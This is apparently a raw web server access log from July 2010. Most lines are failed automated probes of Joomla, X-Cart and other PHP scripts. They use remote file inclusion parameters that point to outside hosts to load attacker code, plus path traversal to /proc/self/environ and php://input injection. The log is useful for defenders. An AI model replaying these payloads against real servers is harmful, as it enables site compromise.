213.145.228.170 - - [27/Jul/2010:07:41:57 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:42:02 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:42:02 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:42:02 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:43:24 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:43:24 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:43:24 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
76.13.114.107 - - [27/Jul/2010:07:44:22 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:44:46 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:44:46 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:44:46 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
202.70.136.22 - - [27/Jul/2010:07:48:28 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.70.136.22 - - [27/Jul/2010:07:48:29 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.70.136.22 - - [27/Jul/2010:07:48:29 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.194 - - [27/Jul/2010:07:50:51 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
202.47.80.12 - - [27/Jul/2010:07:55:21 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
202.47.80.12 - - [27/Jul/2010:07:55:21 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
202.47.80.12 - - [27/Jul/2010:07:55:27 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
202.47.80.12 - - [27/Jul/2010:07:55:27 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:55:40 -0700] "GET /logs/access_100614.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:56:48 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:08:00:40 -0700] "GET /logs/access_100614.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
213.215.178.34 - - [27/Jul/2010:08:01:48 -0700] "GET /logs/access_100614.log/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:02:08 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:02:08 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
213.215.178.34 - - [27/Jul/2010:08:04:27 -0700] "GET /logs/access_100614.log/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
211.238.14.22 - - [27/Jul/2010:08:05:41 -0700] "GET /logs/access.log///?_PHPLIB[libdir]=http://stemandstein.com//poll/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
70.38.11.39 - - [27/Jul/2010:08:07:33 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
70.38.11.39 - - [27/Jul/2010:08:07:33 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
70.38.11.39 - - [27/Jul/2010:08:07:33 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
70.38.11.39 - - [27/Jul/2010:08:12:30 -0700] "GET /logs/access_100614.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:13:55 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:14:00 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:14:00 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:14:06 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:14:06 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:14:11 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.207 - - [27/Jul/2010:08:16:11 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
70.38.11.39 - - [27/Jul/2010:08:21:54 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
70.38.11.39 - - [27/Jul/2010:08:21:54 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
70.38.11.39 - - [27/Jul/2010:08:21:54 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:08:24:02 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:08:24:02 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:08:24:10 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
70.38.11.39 - - [27/Jul/2010:08:26:43 -0700] "GET /logs/access_100614.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
202.70.136.22 - - [27/Jul/2010:08:27:24 -0700] "GET /logs/access_100614.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.106 - - [27/Jul/2010:08:36:01 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
81.208.34.38 - - [27/Jul/2010:08:37:31 -0700] "GET /logs/access_100614.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
212.241.251.207 - - [27/Jul/2010:08:47:32 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=szss.com/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
70.38.11.39 - - [27/Jul/2010:08:47:56 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
70.38.11.39 - - [27/Jul/2010:08:47:56 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
70.38.11.39 - - [27/Jul/2010:08:47:56 -0700] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:56:13 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:56:15 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:56:19 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:56:21 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:56:25 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:08:56:27 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
208.80.193.39 - - [27/Jul/2010:09:06:10 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; yplus 5.1.02b)" "www.redneckmba.com"
76.13.123.194 - - [27/Jul/2010:09:09:06 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.141.91.138 - - [27/Jul/2010:09:16:38 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [27/Jul/2010:09:16:38 -0700] "GET /send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [27/Jul/2010:09:16:38 -0700] "GET /logs/send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [27/Jul/2010:09:16:39 -0700] "GET /send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [27/Jul/2010:09:16:39 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [27/Jul/2010:09:16:40 -0700] "GET /logs/send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.207 - - [27/Jul/2010:09:20:04 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
200.175.239.226 - - [27/Jul/2010:09:26:25 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.175.239.226 - - [27/Jul/2010:09:26:25 -0700] "GET /admin/auth.php?xcart_dir=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.175.239.226 - - [27/Jul/2010:09:26:25 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [27/Jul/2010:09:29:27 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
194.50.116.153 - - [27/Jul/2010:09:31:08 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.redneckmba.com"
194.50.116.153 - - [27/Jul/2010:09:31:09 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "www.redneckmba.com"
200.175.239.226 - - [27/Jul/2010:09:32:56 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.175.239.226 - - [27/Jul/2010:09:32:57 -0700] "GET /admin/auth.php?xcart_dir=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.175.239.226 - - [27/Jul/2010:09:32:57 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:09:51:08 -0700] "GET /logs/access_100614.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:09:51:10 -0700] "GET /logs/access_100614.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
88.131.106.5 - - [27/Jul/2010:10:08:07 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.3 - - [27/Jul/2010:10:08:08 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
211.236.43.200 - - [27/Jul/2010:10:10:47 -0700] "GET /appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.236.43.200 - - [27/Jul/2010:10:10:47 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.236.43.200 - - [27/Jul/2010:10:10:47 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
110.138.208.125 - - [27/Jul/2010:10:12:59 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
110.138.208.125 - - [27/Jul/2010:10:12:59 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
110.138.208.125 - - [27/Jul/2010:10:13:02 -0700] "GET /appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.129.119.45 - - [27/Jul/2010:10:18:35 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "redneckmba.com"
216.129.119.47 - - [27/Jul/2010:10:18:59 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "redneckmba.com"
209.97.216.92 - - [27/Jul/2010:10:23:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
66.163.171.206 - - [27/Jul/2010:10:23:48 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
220.125.208.51 - - [27/Jul/2010:10:24:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:10:24:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:10:24:17 -0700] "GET /index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:10:24:18 -0700] "POST /index.php?option=com_gcalendar&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
209.97.216.92 - - [27/Jul/2010:10:25:47 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.97.216.92 - - [27/Jul/2010:10:25:47 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.97.216.92 - - [27/Jul/2010:10:25:48 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.114.106 - - [27/Jul/2010:10:26:16 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.195.115.240 - - [27/Jul/2010:10:28:52 -0700] "GET /?S=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:32:22 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:32:22 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:32:23 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:32:29 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:33:02 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
